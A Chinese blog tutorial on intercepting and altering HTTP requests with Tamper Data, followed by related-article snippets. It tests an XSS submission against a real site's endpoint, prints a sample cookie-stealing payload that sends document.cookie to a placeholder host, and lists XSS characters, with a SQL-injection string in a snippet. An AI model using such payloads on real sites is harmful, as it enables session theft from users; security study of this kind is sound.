使用Tamper Data 提交XSS攻击数据

最新推荐文章于 2023-02-01 14:18:45 发布
最新推荐文章于 2023-02-01 14:18:45 发布
阅读量3.2k 收藏 2
点赞数
分类专栏: security 文章标签: firebug javascript firefox csrf 脚本 filter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liu251/article/details/7630158
版权

使用Tamper Data 提交XSS攻击数据

简介

       作为 Firefox 的插件, Tamper Data 简单易用,功能强大,可以用来查看和修改 HTTP/HTTPS 的头部和 POST 参数,模型web攻击;可以用来跟踪 HTTP 请求和响应并记时;

使用

Tamper提供请求监控和修改功能

2.1 请求监听

工具页面分为:

监控窗口:

firefox所有tab打开网页发送的 HTTP 请求及其对应的响应都会被 Tamper Data 监控下来(默认状态)

左下角窗口为每个请求的头信息。类似Firebug

右下角窗口为每个请求的返回头信息,类似Firebug。请求返回的详细信息,要通过鼠标右键 点击http请求-view source来显示。

注:Filter 可以只显示指定域名的请求。

2.2 拦截请求

在点击Start Tempar之后,会弹窗:


点击Tamper

右键,可以:添加新的请求参数、请求头,在参数名上右键,可以弹出菜单,其中有 xss/sql/data 选项,xss有预定义xss script脚本。或者直接修改 参数对应的value。点击确定之后,就会提交请求。 

XSS攻击示例

对接口,自定义皮肤:http://t.163.com/user.do?action=updateUserConfig进行非法数据提交(xss

Start Tamper,点击页面的保存按钮。

会弹窗:


"Tamper"操作:


修改为:

提交之后:


服务器返回555,后台禁止 非法数据提交。

原理:


. Tamper Option

默认不支持图片拦截,可以在Option选项中启用。Context Menu也可以添加一些自定义数据。


. XSS介绍

http://hi.baidu.com/jinuyasha/blog/item/eb38b91801bcf9ed1ad576a6.html  浅谈反射型XSS的利用

http://huaidan.org/archives/2561.html  基于CSRFXSS攻击

http://huaidan.org/archives/2450.html Anehta -- Boomerang(回旋镖),如何将反射型XSS变成持久型XSS:论跨域获取cookie

http://huaidan.org/archives/674.html XSS攻击Cookie欺骗中隐藏JavaScript执行

 http://t.163.com/nathanliu#!javascript:alert(document.cookie);   如果url中是这样的脚本:document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie) 

http://www.cnblogs.com/jonniexie/articles/1761813.html 【WebGoat笔记】之四 --- Cross-Site Scripting (XSS) CSRF

http://www.4shell.org/archives/468.html  Anehta -- 新一代的web攻击平台

http://huaidan.org/archives/650.html  在XSS中如何再插JS(解决方案,用户输入img src的时候要验证srchttp格式)

http://baike.baidu.com/view/2161269.htm  XSS攻击


xss攻击常用符号:

[1] <>(尖括号)

[2] "(引号)

[3] '(单引号)

[4] %(百分比符号)

[5] ;(分号)

[6] ()(括号)

[7] &符号)

[8] +(加号)




wavefly_liu
关注
专栏目录
Python全栈(五)Web安全攻防之8.XSS攻击(上)
CUFEECR的博客
03-13 5067
绕过SQL注入包括绕过去除注释符、绕过剔除and和or和绕过去除空格3种形式,各有自己的绕开方法。XSS是恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,script代码会被执行,达到恶意攻击用户的目的;cookie包含有关用户的信息;XSS分为反射型、存储型和DOM型3种;可以通过Python利用cookie会话劫持;XSS可以使用JS篡改网页链接,还可以额使用beef-xss实现;还可以通过克隆登录页面获取用户信息,如setoolkit工具。XSS攻击包括闭合标签和属性中实现等方式。
Tamper data
07-12
安装firefox浏览器后,根据提示会自动安装Tamper data插件,需要的小伙伴可以看下,找了好半天才找到这个插件。
Tamper Data安装与使用
javascript, java, 各种新技术
04-29 786
    Tamper Data概览   注意:我将会讲述一些有关Tamper Data的基本常识,包括它的基本功能,如何安装等。  Tamper Data是什么?   Tamper Data 的真实含义,即“篡改数据”(或者说定制 HTTP 请求):截取浏览器发出的每一个 HTTP 请求,提示我们选择是要进行定制,还是不做定制而直接提交请求,还是终止当前被截取的请求,然后根据我们的选...
WEB 服务器调试利器 -- Tamper Data(转)
溺水的鱼 - Later equals never.
07-29 900
 一. 简介       作为 Firefox 的插件, Tamper Data 简单易用,功能强大,可以用来查看和修改 HTTP/HTTPS 的头部和 POST 参数;可以用来跟踪 HTTP 请求和响应并记时;可以对 WEB 站点进行某些安全测试,从而为调试 WEB 配置带来了极大的便利,是网站维护人员不可多得的实用工具。 二. 安装      Ta
xss攻击
m0_73170217的博客
02-01 380
xss跨站脚本攻击、利用及防御
Tamper Data
我的地盘
05-23 579
使用 tamperdata 可以查看并且修改 HTTP/HTTPS 头,以及 post 方法提交的参数~
XSS攻击和SQL注入攻击实验过程
qq_20381661的专栏
04-04 2372
(一)XSS攻击 1.XSS Alert; (1)访问www.dvssc.com,在Train中的Username输入:admin’or’1=1,登录网页,选择Mutillidae,在Core Contrals的Retister中注册Alice和Bob两个用户。 (2)以Alice身份登录,在左侧菜单中选择 A2-Cross Site Scripting (XSS),点击“Add to your blog”,输入<script>alert(’XSS’);</scrip..
浅谈XSS攻击
幸福诗歌的博客
01-24 419
  XSS攻击 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 (1)反射型xs...
XSS Attacks
12-18
通过以上章节的详细介绍,我们可以看到,《XSS Attacks: Cross Site Scripting Exploits and Defense》这本书不仅全面地覆盖了XSS攻击的基础知识、工具使用、理论探讨以及具体的攻击方法,而且还提供了许多实用的...
tamper data xpi
11-07
tamper data 11.0.1 ,直接将xpi文件拖到firefox中就可安装
firefox 插件 tamper data 11.1.0
09-08
firefox 插件 tamper data 10.1.0 适用版本3.6及以后 安装: 1,打开firefox 2,把该文件拖进去安装
Firefox 3.6版,可安装Tamper Data
10-31
Firefox 3.6版,可安装Tamper Data;Tamper Data 扩展, 可以在日志中记录 Web 浏览器发出的每个请求,并显示每个请求所用的下载时间。使用这个扩展的方法是,选择 Tools > Tamper Data 来打开 Ongoing requests 窗口。装载要考察的页面,然后就会看到浏览器发出的每个请求的状态和装载每个元素所用的时间。
xss攻击(post)流量数据
07-18
xss攻击(post)流量数据
tamper data
kirin
06-03 265
tamper data  --  fire fox的插件 Tamper Data 的真实含义,即“篡改数据”(或者说定制 HTTP 请求):截取浏览器发出的每一个 HTTP 请求,提示我们选择是要进行定制,还是不做定制而直接提交请求,还是终止当前被截取的请求,然后根据我们的选择决定是打开定制窗口,还是直接向 WEB 服务器提交请求,还是终止当前的请求。 Tamper Data 不但允许用户访问表单...
抓包工具Tamper DataFirefox的一个插件)
CallMeXiaoHuhuu
05-20 3642
https://www.cnblogs.com/kabi/p/6288711.html
Tamper Data介绍
Shellcode.Cool!
04-19 760
Tamper Data是什么? Tamper Data 的真实含义,即“篡改数据”(或者说定制 HTTP 请求):截取浏览器发出的每一个 HTTP 请求,提示我们选择是要进行定制,还是不做定制而直接提交请求,还是终止当前被截取的请求,然后根据我们的选择决定是打开定制窗口,还是直接向 WEB 服务器提交请求,还是终止当前的请求。 Tamper Data 不但允许用户访问表单数据元素,
火狐必备插件之--TAMPER DATA 使用
lzj0470的专栏
12-04 7752
一. 简介 作为 Firefox 的插件, Tamper Data 简单易用,功能强大,可以用来查看和修改 HTTP/HTTPS 的头部和 POST 参数;可以用来跟踪 HTTP 请求和响应并记时;可以对 WEB 站点进行某些安全测试,从而为调试 WEB 配置带来了极大的便利,是网站维护人员不可多得的实用工具。 二. 安装 Tamper Data 的安装很简单,如下所示: 第一步:打开 F
Tamper Data 插件使用
一个普通的程序员
07-24 3468
[url]http://hi.baidu.com/crud0906/blog/item/bf0cbd180d56423e40341750.html[/url]
tampermonkey插件使用
最新发布
08-22
使用 Tampermonkey 插件的方法如下: 1. 首先,确保你的浏览器是 Chrome、Microsoft Edge、Safari、Opera Next 或 Firefox。因为 Tampermonkey 是一个浏览器扩展,只能在这些浏览器上使用。 2. 如果你使用的是 Chrome 浏览器,可以直接在 Chrome 应用商店中搜索 Tampermonkey,并将其添加为扩展程序。 3. 如果你使用的是其他浏览器,或者在 Chrome 应用商店中无法找到 Tampermonkey,你可以通过访问 Tampermonkey 的官方网站来下载插件。打开浏览器,输入 Tampermonkey 的官方网址(https://www.tampermonkey.net/)并下载插件。 4. 下载完插件后,根据浏览器的提示进行安装。安装完成后,Tampermonkey 图标将会显示在浏览器的工具栏上。 5. 现在,你可以开始使用 Tampermonkey 插件了。Tampermonkey 的主要功能是管理用户脚本,它允许你安装、启用、禁用和删除用户脚本,以及自定义脚本的运行方式。 6. 要安装用户脚本,你可以在 Tampermonkey 的管理界面中找到一个脚本,然后点击安装按钮。你也可以在一些脚本分享网站上找到感兴趣的用户脚本,并通过点击安装按钮来安装它们。 7. 安装完成后,你可以在 Tampermonkey 的管理界面中启用或禁用用户脚本。启用后,用户脚本将会在你访问相关网页时自动运行。 请根据你所使用的浏览器和具体需求,选择适合的方法来安装和使用 Tampermonkey 插件。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [浏览器扩展插件:「油猴」使用详解 ( Tampermonkey )](https://blog.csdn.net/Vue2018/article/details/100524457)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [Tampermonkey(油泼狓)插件的安装及使用](https://blog.csdn.net/m0_46596133/article/details/106755158)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值